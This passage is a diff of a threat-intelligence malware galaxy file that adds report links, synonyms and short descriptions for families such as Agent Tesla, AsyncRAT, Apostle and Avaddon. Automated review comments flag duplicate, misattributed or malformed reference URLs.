 "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
 "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a",
@@ -7908,26 +9042,40 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/",
- "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
- "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
+ "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
+ "https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant",
+ "https://community.riskiq.com/article/40000d46",
+ "https://community.riskiq.com/article/56e28880",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://blog.malwarelab.pl/posts/basfu_aggah/",
+ "https://www.telsy.com/download/4832/",
+ "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/",
 "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/",
 "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware",
 "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
 "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/",
- "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4",
+ "https://menshaway.blogspot.com/2021/04/agenttesla-malware.html",
+ "https://isc.sans.edu/diary/27666",
 "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/",
+ "https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware",
 "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/",
+ "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
 "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting",
 "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/",
 "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr",
+ "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
 "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/",
 "https://isc.sans.edu/diary/27088",
 "https://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
+ "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4",
 "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
 "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/",
+ "https://www.youtube.com/watch?v=Q9_1xNbVQPY",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/",
- "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
 "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
 "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
 "https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf",
@@ -7939,20 +9087,31 @@
 "https://malwatch.github.io/posts/agent-tesla-malware-analysis/",
 "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/",
 "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/",
 "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/",
 "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "http://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://community.riskiq.com/article/6337984e",
 "https://isc.sans.edu/diary/rss/27092",
 "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/",
+ "https://twitter.com/MsftSecIntel/status/1392219299696152578",
+ "https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/",
 "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/",
 "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf",
 "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://blog.malwarelab.pl/posts/basfu_aggah/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
+ "http://blog.nsfocus.net/sweed-611/",
 "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
 "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
 "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/"
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols"
 ],
 "synonyms": [
 "AgenTesla",
@@ -7983,6 +9142,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas",
 "https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas",
+ "https://blog.group-ib.com/task",
 "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/"
 ],
 "synonyms": [
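Review bot: The added `http://www.secureworks.com/research/threat-profiles/gold-galleon` is the cleartext twin of `https://www.secureworks.com/research/threat-profiles/gold-galleon`, which is already in this same refs array (it is a context line of the preceding hunk), so the Agent Tesla entry now lists one profile twice and any dedup that compares URLs byte-for-byte will miss it; drop the `http://` line. `http://blog.nsfocus.net/sweed-611/` added a few lines later is also plain http — if the host serves https, prefer that form, since analysts click these links from enrichment views. The albaniiutas hunk sharing this line raises nothing.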
@@ -8067,9 +9227,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore",
- "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
 "https://twitter.com/_re_fox/status/1212070711206064131",
- "https://github.com/Anderson-D/AllaKore"
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
+ "https://github.com/Anderson-D/AllaKore",
+ "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
+ "https://blog.talosintelligence.com/2021/07/sidecopy.html"
 ],
 "synonyms": [],
 "type": []
@@ -8208,7 +9372,8 @@
 "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html",
 "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/",
 "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt",
- "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/"
+ "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/",
+ "https://www.youtube.com/watch?v=FttiysUZmDw"
 ],
 "synonyms": [
 "Olmarik",
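Review bot: The added `.../Network_IOCs_list_for_coverage.txt?1625657479` carries a cache-busting query string that its two sibling S3 links in the same hunk do not, so the same document referenced without the parameter elsewhere will not dedup against it; strip it to `.../original/Network_IOCs_list_for_coverage.txt`, assuming the object is served without the parameter (it looks like a timestamp, not an auth token). Bare `s3.amazonaws.com` attachments are also fragile as long-lived references; the `blog.talosintelligence.com/2021/07/sidecopy.html` post added alongside is the durable pointer and should stay first. The alureon hunk on this line raises nothing.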
@@ -8227,18 +9392,22 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey",
+ "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
 "https://twitter.com/ViriBack/status/1062405363457118210",
 "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/",
 "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
+ "https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4",
 "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
 "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/",
 "https://nao-sec.org/2019/04/Analyzing-amadey.html",
+ "https://isc.sans.edu/diary/27264",
 "https://www.anquanke.com/post/id/230116",
 "https://twitter.com/0xffff0800/status/1062948406266642432",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672"
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/"
 ],
 "synonyms": [],
 "type": []
@@ -8281,10 +9450,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor",
- "https://www.netscout.com/blog/asert/dropping-anchor",
+ "https://isc.sans.edu/diary/27308",
 "https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns",
 "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
 "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
+ "https://www.netscout.com/blog/asert/dropping-anchor",
 "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
 "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns",
 "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/",
@@ -8293,6 +9463,7 @@
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/",
+ "https://www.kryptoslogic.com/blog/2021/07/adjusting-the-anchor/",
 "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607",
 "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
 "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth"
@@ -8308,6 +9479,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
 "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation",
 "https://blog.avast.com/andromeda-under-the-microscope",
 "http://blog.morphisec.com/andromeda-tactics-analyzed",
@@ -8380,7 +9552,7 @@
 "value": "Anel"
 },
 {
- "description": "",
+ "description": "Ransomware that demands payment in Bitcoin.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.antefrigus",
@@ -8391,7 +9563,7 @@
 "type": []
 },
 "uuid": "04788457-5b72-4a66-8f2c-73497919ece2",
- "value": "AnteFrigus Ransomware"
+ "value": "AnteFrigus"
 },
 {
 "description": "",
@@ -8412,7 +9584,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis",
- "https://twitter.com/MsftSecIntel/status/1298752223321546754"
+ "https://twitter.com/MsftSecIntel/status/1298752223321546754",
+ "https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/",
+ "https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/"
 ],
 "synonyms": [
 "Anubis Stealer"
@@ -8448,6 +9622,22 @@
 "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96",
 "value": "Apocalypse"
 },
+ {
+ "description": "Malware used by suspected Iranian threat actor Agrius, turned from wiper into ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apostle",
+ "https://assets.sentinelone.com/sentinellabs/evol-agrius",
+ "https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/",
+ "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf",
+ "https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cb2d3a6f-8ff5-4b08-af95-7377cfe3f7c3",
+ "value": "Apostle"
+ },
 {
 "description": "",
 "meta": {
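Review bot: The `cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-...-fake-antivirus/` reference added to this entry is, by its own URL, about the Android banking trojan Anubis, whereas this cluster is `win.anubis` with synonym `Anubis Stealer` (the `win.` Malpedia id marks a Windows family); Malpedia keeps the Android one as a separate family, so this ref belongs on that entry and here it will cause events enriched from this galaxy to be tagged with the wrong malware. The `therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/` link added beside it does not name the family in its URL, so verify which Anubis it concerns before keeping it. The AnteFrigus `value` rename on this line keeps its uuid, so uuid-keyed consumers are unaffected, but anything matching the old string `AnteFrigus Ransomware` will stop matching.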
@@ -8476,11 +9666,21 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed",
+ "https://asec.ahnlab.com/ko/26705/",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
+ "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf",
 "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf",
+ "https://www.youtube.com/watch?v=Dv2_DK3tRgI",
+ "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/",
+ "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf"
+ "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf"
+ ],
+ "synonyms": [
+ "JamBog"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "c7f8e3b8-328d-43c3-9235-9a2f704389b4",
@@ -8592,6 +9792,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
 "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
 "https://www.freebuf.com/articles/database/192726.html",
 "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/",
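Review bot: The three boho.or.kr downloads in this entry now include a pair that share `attach_file_id=EpF2652.pdf` but differ in `attach_file_seq` (`seq=2651&...EpF2652.pdf`, re-added here, and `seq=2652&...EpF2652.pdf`, new); the mismatched `seq=2651`/`EpF2652` combination looks like a typo of one of the other two and will most likely return either the same report or nothing. Fetch the three and keep only the ones that return distinct documents. The `JamBog` synonym and the conference links raise nothing; the artra hunk on this line is trivial.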
@@ -8664,9 +9865,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/",
 "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/",
 "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/",
+ "https://isc.sans.edu/diary/27482",
 "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf",
 "https://blog.talosintelligence.com/2020/05/astaroth-analysis.html",
 "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
@@ -8688,15 +9891,31 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service",
+ "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
 "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://labs.k7computing.com/?p=21759",
 "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf",
 "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/",
- "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/"
+ "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
+ "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
+ "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://twitter.com/MsftSecIntel/status/1392219299696152578",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html",
+ "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
+ "https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies",
+ "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols"
 ],
 "synonyms": [],
 "type": []
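Review bot: `https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf` is, by its path, a generic SSL/TLS technical brief and not an AsyncRAT report; it sits next to the APT-C-36 `BlindEagleIOCList.txt` from the same content store and looks like it was collected along with it. Confirm the PDF actually discusses AsyncRAT, otherwise remove it, since an unrelated protocol primer among the refs misleads analysts pivoting from this cluster. The hunk starts on the previous line and ends here.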
@@ -8787,6 +10006,21 @@
 "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187",
 "value": "ATMSpitter"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo",
+ "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/",
+ "https://chuongdong.com//reverse%20engineering/2021/10/13/AtomSiloRansomware/",
+ "https://twitter.com/siri_urz/status/1437664046556274694?s=20"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f47633fb-2c2b-46c3-a1e6-2204d56897b8",
+ "value": "ATOMSILO"
+ },
 {
 "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor’s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware’s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.",
 "meta": {
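Review bot: The new ATOMSILO refs contain two malformed URLs: `https://chuongdong.com//reverse%20engineering/...` has a doubled slash after the host, and `...status/1437664046556274694?s=20` keeps Twitter's share-tracking parameter, which the other twitter refs in this file (e.g. `twitter.com/ClearskySec/status/1377176015189929989`) do not carry. Normalise them to `"https://chuongdong.com/reverse%20engineering/2021/10/13/AtomSiloRansomware/"` and `"https://twitter.com/siri_urz/status/1437664046556274694"` so they dedup against the same links elsewhere. The `description` is left empty even though the Sophos title in the refs already states the family's nature (ransomware delivered via a Confluence exploit and DLL side-loading); a one-sentence description sourced from it would help consumers that display this field.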
@@ -8857,28 +10091,43 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
 "https://twitter.com/Securityinbits/status/1271065316903120902",
+ "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
 "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/",
+ "https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/",
+ "https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire",
 "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/",
+ "https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/",
 "https://www.swascan.com/it/avaddon-ransomware/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://arxiv.org/pdf/2102.04796.pdf",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/",
 "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted",
- "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/",
+ "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
 "https://twitter.com/dk_samper/status/1348560784285167617",
+ "https://arxiv.org/pdf/2102.04796.pdf",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
 "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
 "https://www.tgsoft.it/files/report/download.asp?id=568531345",
- "https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/"
+ "https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "8f648193-68ca-40c2-98b2-e5481487463e",
- "value": "Avaddon Ransomware"
+ "value": "Avaddon"
 },
 {
 "description": "",
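Review bot: `https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3` is an untitled Google Sheet with no visible author or publication; its content can be edited or withdrawn at any time, so it is not a citable reference for a threat-intel cluster — replace it with the article that embeds the sheet, or drop it. `https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-...` is a DarkSide story by its URL; confirm it covers Avaddon before keeping it here. The `value` rename from `Avaddon Ransomware` to `Avaddon` preserves the uuid, so uuid-keyed consumers are unaffected, but rules or tags that match on the old value string will stop matching; that trade-off should be stated in the commit message. The hunk begins two lines earlier and ends here.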
@@ -8925,25 +10174,34 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest",
